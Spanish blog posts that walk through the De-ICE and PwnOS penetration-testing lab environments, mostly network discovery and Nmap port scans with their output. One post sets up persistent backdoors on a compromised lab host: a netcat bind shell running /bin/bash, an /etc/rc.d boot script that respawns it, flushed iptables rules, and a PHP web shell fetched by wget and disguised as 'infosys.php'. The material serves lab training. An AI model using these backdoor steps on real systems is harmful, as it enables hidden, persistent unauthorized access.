Objetivos Generales para los entornos De-Ice I, II, III y PwnOS

También es necesario describir nuevamente el escenario propuesto para este Test de Penetración:

De-ICE PenTest LiveCDs (Nivel III)

El procedimiento de implementación de este entorno no varía mucho con respecto a los anteriores. Tan solo cambia la red objetivo, que para esta ocasión será la 192.168.2.*

Identifiquemos los host vivos (conectados) en la red (Tool: Netdiscover incluída en BackTrack):

root@bt:~# netdiscover eth0

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:07    01    060   Unknown vendor
 192.168.2.100   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 192.168.2.101   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 Currently scanning: 192.168.9.0/16   |   Our Mac is: 00:0c:29:ac:c4:e0 - 0

Una vez hemos identificados los posibles host’s objetivos pasemos a escanearlos en detalle para obtener más información sobre estos.

Veamos este proceso con Nmap.

Escaneo y explicación enviada por Roguer (jollyroguer [at] gmail.com):

root@bt: ~#nmap -sP 192.168.2.1-255
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-25 23:35 UTC
Host 192.168.2.10 is up.
Host 192.168.2.100 is up (0.00066s latency).
MAC Address: 00:0C:29:78:57:AE (VMware)
Host 192.168.2.101 is up (0.00066s latency).
MAC Address: 00:0C:29:78:57:AE (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.06 seconds

En donde obtengo que hay 3 equipos arriba, de los cuales el .10 es mi máquina y los 100 y 101 objetivos enseguida nos centraremos en el equipo .100

Arranco haciendo un escaneo de puertos, como es un entorno seguro no hay necesidad de ocultar la ip de origen

root@bt: ~#nmap -sV -T Aggressive -O 192.168.2.100
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-25 23:36 UTC
Interesting ports on 192.168.2.100:
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd 2.0.4
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https
MAC Address: 00:0C:29:78:57:AE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 – 2.6.24
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix
OS and Service detection performed. Please report any incorrect
results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

Como podemos ver hay varios servicios corriendo en este equipo, así que vamos a tratar de obternet información como en los entornos anteriores.

——————————————————————————————–

Realicemos un escaneo para identificar servicios y versiones en el host 192.168.2.101

root@bt:~# nmap -PT80 192.168.2.101

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:09 COT
Interesting ports on 192.168.2.101:
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:0C:B9:E5 (VMware)

root@bt:~# nmap -sV -p 80 192.168.2.101

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:12 COT
Interesting ports on 192.168.2.101:
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
MAC Address: 00:0C:29:0C:B9:E5 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

Perfecto el proceso de mapeo de red e identificación de aplicaciones y servicios en los host objetivos. En el próximo post centraremos nuestra atención a las actvidades relacionadas con la enumeración del objetivo e identificación de posibles puntos de intrusión.

Objetivos Generales para los entornos De-Ice I, II, III y PwnOS

Ahora bien, comencemos con el mapeo de red y el escanéo de puertos. Para ello nada mejor que el archiconocido Network Mapper (Nmap) (Incluída en BackTrack).

Probemos con un barrido de pings con Nmap.

root@bt:~# nmap -sP 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-19 02:23 COT
Host desktop.lan (192.168.1.2) is up.
Host 192.168.1.110 is up (0.00059s latency).
MAC Address: 08:00:27:FE:36:B6 (Cadmus Computer Systems)
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.21 seconds

Comprobemos estos resultados utilizando la herramienta lanmap (Incluída en BackTrack)

root@bt:~# lanmap -i wlan0 -T png -o /tmp/
cmd:twopi -Tpng -o /tmp/tmp.lanmap lanmap.dot && mv /tmp/tmp.lanmap /tmp/lanmap.png && rm lanmap.dot

Una vez identificados los host conectados en ese segmento de red comprobemos y listemos cual de ellos es nuestro sistema objetivo. Para ello identifiquemos el estado de sus puertos y los servicios que se ejecutan sobre ellos.

Volvamos a Nmap:

root@bt:~# nmap 192.168.1.110

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-20 10:36 EST
Interesting ports on 192.168.1.110:
Not shown: 996 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
631/tcp open  ipp
MAC Address: 00:0C:29:58:68:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds

Según estos resultados este host tiene altas posibilidades de ser el sistema objetivo por los puertos ofrecidos (Y nos lo dicen en las instrucciones… pero como la idea es aprender más entonces hice el escaneo para mostrar como podemos identificar este tipo de información).

Ahora profundicemos sobre las versiones de dichos puertos:

root@bt:~# nmap -sV -O -p 21,22,80,631 -D 10.1.1.1 192.168.1.110

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-20 10:40 EST
Interesting ports on 192.168.1.110:
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 2.0.4
22/tcp  open  ssh?
80/tcp  open  http    Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open  ipp     CUPS 1.1
MAC Address: 00:0C:29:58:68:0D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 – 2.6.24
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds

La idea es que para el próximo post se investigue sobre la funcionalidad de cada uno de esos puertos y consultemos además si existen vulnerabilidades para dichas versiones… Además vendría bien realizar intentos de conexión a dicho puertos para analizar las respuestas obtenidas.

]]> http://www.sec-track.com/desarollo-del-entorno-de-ice-ii-%e2%80%93-network-mapping-port-scanning/feed 0 http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso#comments Thu, 10 Dec 2009 06:53:00 +0000 4v4t4r http://www.sec-track.com/?p=281 Ahora que hemos conseguido elevar privilegios y acceder a la información crítica contenida en el sistema objetivo, veamos algunos métodos para mantener el acceso al sistema. Sobra aclarar que toda la información publicada es de carácter educativo, y solo busca recrear de la mejor manera los ataques a los que están expuestos los sistemas y sus administradores y oficiales de seguridad. Todo ello con la finalidad de adquirir destrezas y habilidades en los temas relacionados con los Test de Penetración.

La finalidad de usar sistemas backdoors (puertas traseras) es mantener un acceso al sistema de manera oculta al administrador del sistema, los cuales permitirán una entrada luego de un reinicio del sistema o ciertas condiciones a la que se someta el sistema sin necesidad de penetrar nuevamente el sistema.

El tema de backdoors en sistemas es más un arte que una técnica, ya que esta obliga al PenTester a usar toda su creatividad e imaginación para lograr su objetivo de conseguir un acceso en cualquier momento al sistema sin ser descubierto.

Solo mostraré algunos métodos para crear puertas traseras con la herramienta Netcat y otro con el servicio de publicación en Web (PHP), con la finalidad de que los lectores se animen y publiquen los métodos que conozcan y nos vayamos preparando para los entornos que vienen.

Ya hemos hablado anteriormente de Netcat (Video Tutorial Netcat en BackTrack), ahora aprovechemos el entorno disponible para practicar los aprendido.

Para nuestra fortuna, en el entorno De-Ice I netcat se encuentra disponible en dicho sistema, por lo tanto solo necesitamos dejarlo a la escucha.

Antes de ello es necesario verificar como se encuentra configurado el sistema de IPTABLES con la finalidad de analizar como se realizan las conexiones al sistema (conexiones permitidas, conexiones denegadas, etc)

root@slax:/# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  –  anywhere             anywhere
ACCEPT     udp  –  anywhere             anywhere            udp dpt:domain
ACCEPT     udp  –  anywhere             anywhere            udp spt:domain
ACCEPT     all  –  anywhere             anywhere            state RELATED,ESTAB                                              LISHED
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ftp-data
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ftp
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:ssh
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:smtp
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:http
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:pop3
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:imap
ACCEPT     tcp  –  anywhere             anywhere            tcp dpt:https
LOG_DROP   all  –  anywhere             anywhere

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
LOG_DROP   all  –  anywhere             anywhere

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  –  anywhere             anywhere

Chain LOG_DROP (2 references)
target     prot opt source               destination
DROP       all  –  anywhere             anywhere

Si quisieramos tirar abajo todas las reglas (no recomendado para el objetivo de pasar desapercibido) solo basta con ejecutar la siguiente instrucción.

root@slax:/# iptables -F

La idea es que los lectores propongan una de las muchas maneras de agregar esta conexión a las reglas de IPTABLES sin tirar las demás abajo (Más información sobre IPTABLES y su configuración/edición)

Luego de esta “limpieza” de reglas vemos como quitamos la negación a peticiones ICMP que observamos al comienzo de la prueba.

S3cTr4cK@0100100-0100100 ~
$ ping 192.168.1.100

Pinging 192.168.1.100 with 32 bytes of data:

Reply from 192.168.1.100: bytes=32 time=1ms TTL=64
Reply from 192.168.1.100: bytes=32 time=1ms TTL=64

Ping statistics for 192.168.1.100:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 1ms, Average = 1ms

Ahora ejecutemos a netcat en modo escucha en el sistema objetivo (De-Ice I)

root@slax:/# nc -l -p 1337 -e /bin/bash

Si realizaramos un escaneo sencillo con nmap a varios puertos incluyendo el que dejamos a la escucha, encontraríamos los siguientes:

C:\Program Files\Nmap>nmap -p 22,25,80,443,1337 192.168.1.100

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-09 23:51 SA Pacific Standard T
Interesting ports on 192.168.1.100:
PORT     STATE  SERVICE
22/tcp   open   ssh
25/tcp   open   smtp
80/tcp   open   http
443/tcp  closed https
1337/tcp open   waste
MAC Address: 00:1A:73:90:81:0B (Gemtek Technology Co.)

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds

Ahora desde nuestro sistema cliente (atacante) solo basta conectarnos al puerto que dejamos a la escucha (1337) y ejecutar algunos comandos:

C:\Documents and Settings\S3cTr4cK\My Documents\Descargas\nc>nc 192.168.1.100 1337
whoami
root
pwd
/
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:43:03:6B
inet addr:192.168.1.100  Bcast:192.168.1.255  Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe43:36b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:6377 errors:0 dropped:0 overruns:0 frame:0
TX packets:1365 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:438725 (428.4 KiB)  TX bytes:169876 (165.8 KiB)
Interrupt:5 Base address:0×2000

lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:176 errors:0 dropped:0 overruns:0 frame:0
TX packets:176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15878 (15.5 KiB)  TX bytes:15878 (15.5 KiB)

uname -a
Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 athlon-4 i386 GNU/Linux

Ahora bien… ¿Qué pasaría si quisieramos que dicha instrucción se ejecutara al inicio del sistema objetivo?

Solo basta automatizar dicho inicio alojando la instrucción (script) en el directorio /etc/rc.d

Veamos el contenido de este directorio y un ejemplo de script para dicho propósito:

Contenido:

root@slax:/etc/rc.d# ls
rc.0         rc.alsa      rc.inet1       rc.nfsd        rc.sshd
rc.4         rc.bind      rc.inet1.conf  rc.pcmcia      rc.syslog
rc.6         rc.cups      rc.inet2       rc.portmap     rc.sysvinit
rc.FireWall  rc.firewall  rc.inetd       rc.saslauthd   rc.udev
rc.K         rc.font.new  rc.ip_forward  rc.sendmail    rc.vsftpd
rc.M         rc.gpm       rc.local       rc.serial      rc.wireless
rc.S         rc.hotplug   rc.modules     rc.slax        rc.wireless.conf
rc.acpid     rc.httpd     rc.mysqld      rc.slaxconfig

Hagamos entonces lo mismo para Netcat

Script:

root@slax:/etc/rc.d# vi rc.netcat1
#!/bin/sh
mkdir /tmp/netcat
while true ; do
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash
done

Y quedaría así:

root@slax:/etc/rc.d# more rc.netcat1
#!/bin/sh
mkdir /tmp/netcat
while true ; do
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash
done

Otra buena opción sería utilizar a Netcat en modo reverse shell, que también ha sido tratado en el video tutorial citado anteriormente.

El tercer método para habilitar una puerta tracera en el sistema de manera más “discreta” puede ser el uso del servidor web en la máquina objetivo, veamos:

Para ello haremos uso de una shell en el leguaje del lado del servidor PHP.

Primero debemos descargarla y transferirla a la máquina objetivo.

Para la transferencia he habilitado un server en mi máquina, solo basta realizar la petición con wget:

root@slax:~/Desktop# wget http://192.168.1.3/shellphp.txt
–00:34:53–  http://192.168.1.3/shellphp.txt
=> `shellphp.txt’
Connecting to 192.168.1.3:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 63,743 (62K) [text/plain]

100%[====================================>] 63,743        –.–K/s

00:34:53 (64.06 MB/s) – `shellphp.txt’ saved [63743/63743]

root@slax:~/Desktop# ls
Home.desktop  System.desktop  shellphp.txt

root@slax:~/Desktop# cp shellphp.txt /var/www/htdocs/infosys.php

Luego solo bastaría con ingresar en cualquier momento a dicha URL, para mi caso:

http://192.168.1.100/infosys.php

etc…

Vuelvo y reitero la invitación a que los lectores compartan sus métodos para habilitar puertas traseras en sistemas.

En futuros entornos conoceremos algunos métodos aún más avanzados que los presentados en este post realizado a modo de introducción a los Backdoors.

Video Tutorial Nmap from Sec-Track on Vimeo.

Características

• Descubrimiento de servidores: Identifica computadoras en una red, por ejemplo listando aquellas que responden ping.
• Identifica puertos abiertos en una computadora objetivo.
• Determina qué servicios está ejecutando la misma.
• Determinar qué sistema operativo y versión utiliza dicha computadora, (esta técnica es también conocida como fingerprinting).
• Obtiene algunas características del hardware de red de la máquina objeto de la prueba.

• Más información sobre Nmap
• Descargar Nmap (Windows – Linux – MacOSX – *BSD)
• Guía de referencia en español de Namp
• Página Oficial de Namp

Página oficial de Nmap >>

En este corto video tutorial presento varios métodos para llevar a cabo un mapeo de red y escaneo de puertos básicos desde BackTrack con la finalidad de que las personas que recién inician en el desarrollo de estos entornos tengan unas bases para comenzar con el cumplimiento de los objetivos propuestos.

La idea es que una vez visualizado este video tutorial, los interesados continuen y propongan nuevas maneras de cumplir con los objetivos del mismo.

En este video tutorial veremos:

• Identificación de la dirección IP de nuestro sistema (ifconfig)
• Identificación de hosts “vivos” o conectados en nuestra red con netdiscover.
• Verificación del estado de conectividad con el comando ping (ping 192.168.1.100)
• Barrido de Pings con Nmap (nmap -sP 192.168.1.*)
• Port Scanning e identificación de servicios y Sistema Operativo con Nmap y método Decoy (nmap -sV -D 192.168.1.100 -p 21,22,25,80,3306,1521 192.168.1.100)

Video tutorial: Desarrollo De-Ice nivel I – Network Mapping, Port Scanning from Sec-Track on Vimeo.

El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.

Categoría: Fundamentación, Test de Penetración, Explotación de vulnerabilidades.

Nivel de Dificultad: Medio / Alto

Formato: Imágen VMWare

Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Informacion Confidencial.

Herramientas/Recursos: OSSTMM

Configuracion: El router/tarjeta de red virtual/fisica debe tener DHCP activo.

Descargar (Imágen VMWare)

MD5:

Autor / Página Oficial / Más Información: www.0dayclub.com

El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.

Categoría: Fundamentación, Test de Penetración

Nivel de Dificultad: Bajo

Formato: .ISO / Imágen VMWare

Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Información Confidencial.

Herramientas/Recursos: OSSTMM / Nmap / Xhydra / Netcat / Medusa / NetDiscover / Nessus

Configuracion: Este entorno esta configurado para que de manera automática obtenga la dirección IP  192.168.1.100. El router/tarjeta de red virtual/física debe tener DHCP activo, la dirección de inicio debe ser 192.168.1.2 y la máscara de subred 255.255.255.0

Descargar (ISO)

MD5: a3341316ca9860b3a0acb06bdc58bbc1

Autor / Página Oficial / Mas Información: www.Heorot.net